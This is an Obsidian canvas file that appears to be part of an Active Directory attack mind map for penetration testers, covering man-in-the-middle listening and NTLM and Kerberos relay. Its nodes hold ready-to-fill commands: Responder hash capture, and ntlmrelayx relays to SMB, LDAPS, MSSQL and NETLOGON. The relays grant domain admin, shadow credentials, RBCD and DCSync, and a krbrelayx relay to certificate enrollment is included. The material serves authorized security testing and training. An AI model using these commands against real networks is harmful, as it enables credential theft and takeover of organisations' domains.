{
	"nodes":[
		{"id":"c8374b07f31cca6a","type":"group","x":-2440,"y":-5120,"width":3240,"height":4120,"color":"3","label":"MITM (LISTEN & RELAY)"},
		{"id":"7151e34f9179043e","type":"group","x":1440,"y":-5280,"width":1080,"height":766,"color":"2","label":"CRACKING HASH"},
		{"id":"6dd0cbde5428d45b","type":"group","x":1440,"y":-2501,"width":1080,"height":763,"color":"#32a5ff","label":"KERBEROS DELEGATION"},
		{"id":"b147b38c088671e3","type":"group","x":1440,"y":-1560,"width":1080,"height":763,"color":"1","label":"DOAMIN ADMIN"},
		{"id":"7635eb9d5e8d0426","type":"group","x":-3680,"y":-3440,"width":1080,"height":760,"label":"NO CREDENTIALS"},
		{"id":"a48c5848e46bdbda","type":"group","x":1440,"y":-6160,"width":1080,"height":760,"color":"#1a57ff","label":"GOT USERNAME"},
		{"id":"ffd90d4e4d117035","type":"group","x":1440,"y":-4360,"width":1080,"height":760,"color":"4","label":"GOT CREDENTIALS"},
		{"id":"3e04f899ca1fee3e","type":"group","x":1440,"y":-3440,"width":1080,"height":760,"color":"6","label":"LATERAL MOVE"},
		{"id":"a24c27326fe5abcc","type":"group","x":1440,"y":-640,"width":1080,"height":760,"color":"#7806a0","label":"ADCS ABUSE"},
		{"id":"3d70172e86248242","type":"file","file":"INTERACTIVE-MAP.canvas","x":-3600,"y":-3360,"width":920,"height":600},
		{"id":"da3ddf7c1096da49","type":"text","text":"# MITM (LISTEN & RELAY)","x":-2360,"y":-3290,"width":400,"height":50,"color":"3"},
		{"id":"ad62138890387fd8","type":"text","text":"# LISTEN","x":-1743,"y":-4866,"width":166,"height":60},
		{"id":"4592c8e4c72f90cd","type":"text","text":"# 🔥 NTLM Relay to SMB\nRelay to SMB (if SMB is not signed)\n>[!info] Theory\n> - https://www.thehacker.recipes/ad/movement/ntlm/relay\n\n>[!example] Tools\n> - [NetExec](https://github.com/Pennyw0rth/NetExec)\n> - [Impackets - ntlmrelayx](https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py)\n\n```shell\n# Find SMB not signed targets (default if not a Domain controler)\n🕷️ nxc smb '<ip_range>' --gen-relay-list smb_unsigned_ips.txt\n# Relay to SMB\n🟣 ntlmrelayx.py -tf smb_unsigned_ips.txt -smb2support [--ipv6] -socks\n```","x":-1160,"y":-3980,"width":1300,"height":520},
		{"id":"d51204b34144d321","type":"text","text":"# 🔥 Listen\n>[!info] Theory\n> - https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications\n\n>[!example] Tools\n> - [Responder](https://github.com/lgandx/Responder)\n\n```shell\n⚪ responder -I '<network_interface>' --lm\n```","x":-1160,"y":-5040,"width":1300,"height":407},
		{"id":"8a6fb6fb75b8d43d","type":"text","text":"# NTLM Relay to LDAP(S)\nRelay to LDAP if LDAP signing and LDAPS channel binding not enforced (default)\n>[!info] Theory\n> - https://www.thehacker.recipes/ad/movement/ntlm/relay\n\n>[!example] Tools\n> - [Impackets - ntlmrelayx](https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py)\n\n```shell\n# rbcd\n🟣 ntlmrelayx.py -t ldaps://'<dc_ip>' --remove-mic -smb2support --add-computer '<computer_name>' '<computer_password>' --delegate-access\n# shadow credentials\n🟣 ntlmrelayx.py -t ldaps://'<dc_ip>' --remove-mic -smb2support --shadow-credentials --shadow-target '<dc_name$>' \n# domain admin\n🟣 ntlmrelayx.py -t ldaps://'<dc_ip>' --remove-mic -smb2support --escalate-user '<user>'\n# LDAP shell\n🟣 ntlmrelayx.py -t ldaps://'<dc_ip>' --remove-mic -smb2support --interactive # connect to ldap_shell with nc 127.0.0.1 10111\n```","x":-1160,"y":-4600,"width":1300,"height":580},
		{"id":"1aaaf45f861f5575","type":"text","text":"# HASH  FOUND (NetNTLMv2)","x":240,"y":-4836,"width":460,"height":55,"color":"2"},
		{"id":"75f469ebc752f673","type":"file","file":"ATTACKS/LATERAL MOVE.canvas","x":1520,"y":-3358,"width":920,"height":600,"color":"6"},
		{"id":"012151a2afd9a91c","type":"file","file":"ATTACKS/KERBEROS DELEGATION ABUSE.canvas","x":1520,"y":-2418,"width":920,"height":600,"color":"#32a5ff"},
		{"id":"381d6fc544344e9a","type":"file","file":"ATTACKS/GOT DOMAIN ADMIN ACCESS.canvas","x":1520,"y":-1480,"width":920,"height":600,"color":"1"},
		{"id":"db476095149a5cae","type":"file","file":"ATTACKS/ADCS ABUSE.canvas","x":1520,"y":-562,"width":920,"height":600,"color":"#7806a0"},
		{"id":"8fcd58a189afeefa","type":"text","text":"# CREDENTIALS FOUND","x":240,"y":-4760,"width":383,"height":53,"color":"4"},
		{"id":"34b4bdbdc9c7fa11","type":"text","text":"# HASH  FOUND (NetNTLMv1)","x":240,"y":-4900,"width":460,"height":50,"color":"2"},
		{"id":"cc02aa989b8e807d","type":"text","text":"# USER FOUND","x":240,"y":-4980,"width":249,"height":55,"color":"#1438a3"},
		{"id":"6a94a08e941bd1b3","type":"text","text":"# DOMAIN ADMIN","x":240,"y":-4310,"width":300,"height":41,"color":"1"},
		{"id":"931338626080426f","type":"text","text":"# RBCD","x":240,"y":-4474,"width":150,"height":55,"color":"#32a5ff"},
		{"id":"902aa73f2da673ca","type":"text","text":"# SHADOW CREDENTIALS","x":240,"y":-4390,"width":420,"height":55,"color":"6"},
		{"id":"7956b6f9c18042a5","type":"text","text":"# LDAP  SHELL","x":240,"y":-4240,"width":240,"height":53,"color":"6"},
		{"id":"a431559b1a203614","type":"file","file":"ATTACKS/CRACKING HASH.canvas","x":1520,"y":-5204,"width":920,"height":600,"color":"2"},
		{"id":"7ce7e485ff6e9e87","type":"file","file":"ATTACKS/GOT USERNAME.canvas","x":1520,"y":-6081,"width":920,"height":600,"color":"#1450f0"},
		{"id":"6b5ee8ac7065e388","type":"text","text":"# NTLM Relay to CA web enrollement (HTTP)\n>[!info] Theory\n> - https://dirkjanm.io/ntlm-relaying-to-ad-certificate-services/","x":-1160,"y":-3420,"width":1300,"height":200},
		{"id":"ba5a1a5b3c65e652","type":"text","text":"# SMB SOCKS","x":240,"y":-3746,"width":260,"height":53,"color":"6"},
		{"id":"6c4aeb63a3ed5601","type":"text","text":"# ADCS","x":240,"y":-3350,"width":158,"height":60,"color":"#7906a2"},
		{"id":"23ab1ea5db9392ee","type":"text","text":"# NTLM Relay to SMB  (NETLOGON)\nZero-Logon (`CVE-2020-1472`) : safe method\n>[!info] Theory\n> - https://dirkjanm.io/a-different-way-of-abusing-zerologon/\n\n>[!example] Tools\n> - [Impackets - ntlmrelayx](https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py)\n\n```shell\n# Relay one DC to another\n🟣 ntlmrelayx.py -t dcsync://'<dc_2>' -smb2support -auth-smb '<user>':'<password>'\n```","x":-1160,"y":-2440,"width":1300,"height":460},
		{"id":"9688734c50342ceb","type":"text","text":"# WSUS","x":240,"y":-3110,"width":158,"height":60,"color":"6"},
		{"id":"ccba3e069d41851c","type":"file","file":"ATTACKS/GOT CREDENTIALS.canvas","x":1520,"y":-4280,"width":920,"height":600,"color":"4"},
		{"id":"a1fa72ac8d5e563f","type":"text","text":"# NTLM Relay to WSUS (HTTP)\n>[!info] Theory\n> - https://gosecure.ai/fr/blog/2021/11/22/gosecure-investigates-abusing-windows-server-update-services-wsus-to-enable-ntlm-relaying-attacks/","x":-1160,"y":-3180,"width":1300,"height":200},
		{"id":"ebafd940e0453fa8","type":"text","text":"# NTLM Relay to MSSQL\n>[!info] Theory\n> - https://www.thehacker.recipes/ad/movement/ntlm/relay\n\n>[!example] Tools\n> - [Impackets - ntlmrelayx](https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py)\n\n```shell\n# Relay to MSSQL\n🟣 ntlmrelayx.py -t mssql://'<ip>' [-smb2support] -socks\n```","x":-1160,"y":-2940,"width":1300,"height":460},
		{"id":"c5b2e121a6be8db4","type":"text","text":"# Kerberos Relay to SMB\n>[!info] Theory\n> - https://www.synacktiv.com/publications/relaying-kerberos-over-smb-using-krbrelayx\n\n>[!example] Tools\n> - [krbrelayx](https://github.com/dirkjanm/krbrelayx)\n","x":-1160,"y":-1410,"width":1300,"height":340},
		{"id":"e1a5961af867385c","type":"text","text":"# ADCS","x":240,"y":-1270,"width":158,"height":60,"color":"#7906a2"},
		{"id":"8c57f0f9491573e5","type":"text","text":"# KERBEROS RELAY","x":-1720,"y":-1460,"width":320,"height":60},
		{"id":"9854f9902e05ae82","type":"text","text":"# Kerberos Relay to HTTP\n>[!info] Theory\n> - ???\n\n>[!example] Tools\n> - [Impackets - ntlmrelayx](https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py)\n\n```shell\n# Relay one DC to another\n🟣 krbrelayx.py -t 'http://<pki>/certsrv/certfnsh.asp' --adcs --template DomainController -v '<target_netbios>$' -ip '<attacker_ip>'\n```","x":-1160,"y":-1920,"width":1300,"height":460},
		{"id":"ca0ce02d38c25ff2","type":"text","text":"# ADCS","x":240,"y":-1720,"width":158,"height":60,"color":"#7906a2"},
		{"id":"84cf7aaf8b13af5a","type":"text","text":"# MSSQL SOCKS","x":240,"y":-2736,"width":280,"height":53,"color":"6"},
		{"id":"5b16d197d3bf3427","type":"text","text":"# DCSYNC","x":240,"y":-2236,"width":200,"height":53,"color":"6"},
		{"id":"dced999b089bf352","type":"text","text":"# NTLM RELAY","x":-1760,"y":-3290,"width":260,"height":50}
	],
	"edges":[
		{"id":"965f8ab9037fb64f","fromNode":"3d70172e86248242","fromSide":"right","toNode":"c8374b07f31cca6a","toSide":"left"},
		{"id":"e1cace714f72e210","fromNode":"da3ddf7c1096da49","fromSide":"right","toNode":"ad62138890387fd8","toSide":"left"},
		{"id":"adab0a6e3fc8302c","fromNode":"da3ddf7c1096da49","fromSide":"right","toNode":"dced999b089bf352","toSide":"left"},
		{"id":"60ec6b047997d763","fromNode":"dced999b089bf352","fromSide":"right","toNode":"6b5ee8ac7065e388","toSide":"left"},
		{"id":"b1759fb98971fb08","fromNode":"d51204b34144d321","fromSide":"right","toNode":"cc02aa989b8e807d","toSide":"left"},
		{"id":"b34b1c2dd6a62285","fromNode":"d51204b34144d321","fromSide":"right","toNode":"34b4bdbdc9c7fa11","toSide":"left"},
		{"id":"233ba521bb6a9790","fromNode":"d51204b34144d321","fromSide":"right","toNode":"1aaaf45f861f5575","toSide":"left"},
		{"id":"d2bb726783bf26b4","fromNode":"d51204b34144d321","fromSide":"right","toNode":"8fcd58a189afeefa","toSide":"left"},
		{"id":"36caade89e088798","fromNode":"8a6fb6fb75b8d43d","fromSide":"right","toNode":"931338626080426f","toSide":"left"},
		{"id":"5a9b0c6fbd2b1eb1","fromNode":"8a6fb6fb75b8d43d","fromSide":"right","toNode":"902aa73f2da673ca","toSide":"left"},
		{"id":"214662471eb16b3f","fromNode":"8a6fb6fb75b8d43d","fromSide":"right","toNode":"6a94a08e941bd1b3","toSide":"left"},
		{"id":"a76d8841a31a04d9","fromNode":"8a6fb6fb75b8d43d","fromSide":"right","toNode":"7956b6f9c18042a5","toSide":"left"},
		{"id":"e8be2ef37fcd520b","fromNode":"4592c8e4c72f90cd","fromSide":"right","toNode":"ba5a1a5b3c65e652","toSide":"left"},
		{"id":"0da5672d93f88ed0","fromNode":"6b5ee8ac7065e388","fromSide":"right","toNode":"6c4aeb63a3ed5601","toSide":"left"},
		{"id":"8e57043dc3917425","fromNode":"a1fa72ac8d5e563f","fromSide":"right","toNode":"9688734c50342ceb","toSide":"left"},
		{"id":"453e3556834e0c12","fromNode":"dced999b089bf352","fromSide":"right","toNode":"a1fa72ac8d5e563f","toSide":"left"},
		{"id":"49fd28fa245db40f","fromNode":"dced999b089bf352","fromSide":"right","toNode":"ebafd940e0453fa8","toSide":"left"},
		{"id":"7464ba6bfc97569d","fromNode":"ebafd940e0453fa8","fromSide":"right","toNode":"84cf7aaf8b13af5a","toSide":"left"},
		{"id":"04d7c260c8e714e1","fromNode":"dced999b089bf352","fromSide":"right","toNode":"23ab1ea5db9392ee","toSide":"left"},
		{"id":"ea723c56980672d8","fromNode":"23ab1ea5db9392ee","fromSide":"right","toNode":"5b16d197d3bf3427","toSide":"left"},
		{"id":"758d008562670428","fromNode":"ad62138890387fd8","fromSide":"right","toNode":"d51204b34144d321","toSide":"left"},
		{"id":"d4bff57d927c4750","fromNode":"dced999b089bf352","fromSide":"right","toNode":"8a6fb6fb75b8d43d","toSide":"left"},
		{"id":"5bb5bf7abfd9564d","fromNode":"dced999b089bf352","fromSide":"right","toNode":"4592c8e4c72f90cd","toSide":"left"},
		{"id":"be26ca62280d1397","fromNode":"da3ddf7c1096da49","fromSide":"right","toNode":"8c57f0f9491573e5","toSide":"left"},
		{"id":"7d43199bd45a783f","fromNode":"8c57f0f9491573e5","fromSide":"right","toNode":"9854f9902e05ae82","toSide":"left"},
		{"id":"e1b32b2535fb5c91","fromNode":"8c57f0f9491573e5","fromSide":"right","toNode":"c5b2e121a6be8db4","toSide":"left"},
		{"id":"5d1172be2a90f5b0","fromNode":"9854f9902e05ae82","fromSide":"right","toNode":"ca0ce02d38c25ff2","toSide":"left"},
		{"id":"380afcac842e87a4","fromNode":"c5b2e121a6be8db4","fromSide":"right","toNode":"e1a5961af867385c","toSide":"left"},
		{"id":"0f8dc049c41b8c94","fromNode":"c8374b07f31cca6a","fromSide":"right","toNode":"7ce7e485ff6e9e87","toSide":"left"},
		{"id":"098218ef8e343be0","fromNode":"c8374b07f31cca6a","fromSide":"right","toNode":"a431559b1a203614","toSide":"left","color":"2"},
		{"id":"7bf509a7953357ff","fromNode":"c8374b07f31cca6a","fromSide":"right","toNode":"ccba3e069d41851c","toSide":"left","color":"4"},
		{"id":"3e979ed2a1bd1427","fromNode":"c8374b07f31cca6a","fromSide":"right","toNode":"75f469ebc752f673","toSide":"left","color":"6"},
		{"id":"09379978b91c4c12","fromNode":"c8374b07f31cca6a","fromSide":"right","toNode":"012151a2afd9a91c","toSide":"left","color":"#32a5ff"},
		{"id":"f5a1d2b36ba3896d","fromNode":"c8374b07f31cca6a","fromSide":"right","toNode":"381d6fc544344e9a","toSide":"left","color":"1"},
		{"id":"30f7e8864478dfd2","fromNode":"c8374b07f31cca6a","fromSide":"right","toNode":"db476095149a5cae","toSide":"left","color":"#7806a0"}
	]
}